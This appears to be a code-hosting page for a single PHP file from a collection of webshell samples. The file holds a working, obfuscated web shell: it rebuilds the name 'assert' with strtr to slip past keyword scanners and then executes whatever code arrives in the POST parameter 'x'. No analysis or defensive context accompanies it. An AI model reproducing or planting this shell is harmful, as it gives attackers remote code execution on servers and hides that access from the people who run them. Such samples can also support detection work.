webshell/php/2020.08.20.02.php

5 lines
71 B
PHP
Raw Permalink Normal View History

<?php
$a = strtr('azxcvt','zxcv','sser');
$a($_POST['x']);
?>